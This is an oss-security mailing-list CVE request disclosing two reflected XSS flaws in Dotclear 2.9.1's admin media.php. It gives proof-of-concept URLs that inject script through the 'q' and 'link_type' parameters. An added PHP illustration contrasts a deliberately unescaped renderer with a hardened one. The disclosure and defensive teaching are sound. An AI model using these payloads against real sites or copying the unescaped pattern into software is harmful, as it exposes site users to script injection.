Date: Tue, 2 Aug 2016 06:13:03 +0000
From: 陈瑞琦 <chenruiqi@....cn>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: limingxing <limingxing@....cn>
Subject: CVE request: XSS vulns in Dotclear v2.9.1

I found some XSS vulns in Dotclear v2.9.1

Title: XSS vulns in Dotclear v2.9.1
Author: Chen Ruiqi, Chenruiqi@....cn
Date: 2016-08-01
Download Site: https://dotclear.org/download
Vendor: dotclear.org
Vendor Notified: 2016-08-01
Vendor Contact: security@...clear.net
--------------------------------------------------------------------------------------------------------
Description:
Dotclear is an open source blog publishing application distributed under the GNU GPLv2. Developed originally by Olivier Meunier in 2002, Dotclear has now attracted a solid team of developers. It is relatively popular in French-speaking countries, where it is used by several major blogging platforms (Gandi Blogs, Marine nationale, etc.). (Wiki)
-----------------------------------------------------------------------------------------------------------
Vulnerability:
There are two reflected XSS vulns in the Dotclear v2.9.1 media manager.

/admin/media.php
line 34 $link_type = !empty($_REQUEST['link_type']) ? $_REQUEST['link_type'] : null;
line 62 $q = isset($_REQUEST['q']) ? $_REQUEST['q'] : null;

The user input is put into the page without any filtering.
--------------------------------------------------------------------------------------------------------
PoC Code:
http://*.*.*.*/dotclear/admin/media.php?q=77777%3C%2Fspan%3E%3Cscript%3Ealert(1)%3C/script%3E&popup=0&select=0&plugin_id=&post_id=&link_type=
http://*.*.*.*/dotclear/admin/media.php?q=77777&popup=0&select=0&plugin_id=&post_id=&link_type=8888%22%3E%3Cscript%3Ealert(1)%3C/script%3E
----------------------------------------------------------------------------------------------------------
Fix Code:
https://hg.dotclear.org/dotclear/rev/40d0207e520d


Could you assign CVE ids for these?

Thank you

Chen Ruiqi
Codesafe Team
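For readers of the report, the following is an added illustration of the defect class and its remedy; it is not Dotclear's own code and not the content of the linked fix changeset. The HTML fragment, the function names and the request array are constructed for the example; only the parameter names q and link_type come from the report.

```php
<?php
// Added example, not Dotclear's code. The markup below is constructed for
// illustration; it only mirrors the two request parameters named in the report.
declare(strict_types=1);

// Vulnerable pattern: request values are concatenated into markup unchanged,
// so "</span><script>" in q and "\"><script>" in link_type break out of
// their element-text and attribute contexts respectively.
function render_search_vulnerable(array $request): string
{
    $link_type = !empty($request['link_type']) ? $request['link_type'] : '';
    $q = isset($request['q']) ? $request['q'] : '';
    return '<span class="query">' . $q . '</span>'
         . '<input type="hidden" name="link_type" value="' . $link_type . '">';
}

// Hardened pattern: every value is escaped for the HTML context it lands in.
// ENT_QUOTES encodes both quote styles, so one helper covers element text as
// well as double- or single-quoted attribute values.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_search_hardened(array $request): string
{
    // The (string) casts also stop array-valued parameters (q[]=...) from
    // reaching string concatenation.
    $link_type = !empty($request['link_type']) ? (string) $request['link_type'] : '';
    $q = isset($request['q']) ? (string) $request['q'] : '';
    return '<span class="query">' . esc($q) . '</span>'
         . '<input type="hidden" name="link_type" value="' . esc($link_type) . '">';
}

// Constructed request equivalent to the URL-decoded values in the two PoC URLs.
$request = [
    'q'         => '77777</span><script>alert(1)</script>',
    'link_type' => '8888"><script>alert(1)</script>',
];

// Self-check: the hardened output must carry no live tag, only entity-encoded text.
$out = render_search_hardened($request);
if (strpos($out, '<script>') !== false || strpos($out, '&lt;script&gt;') === false) {
    fwrite(STDERR, "escaping failed\n");
    exit(1);
}
echo $out, PHP_EOL;
```

Escaping at the output site is the fix for this class of bug; validating link_type against the set of values the page actually accepts would be a further defence-in-depth measure, independent of the escaping.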
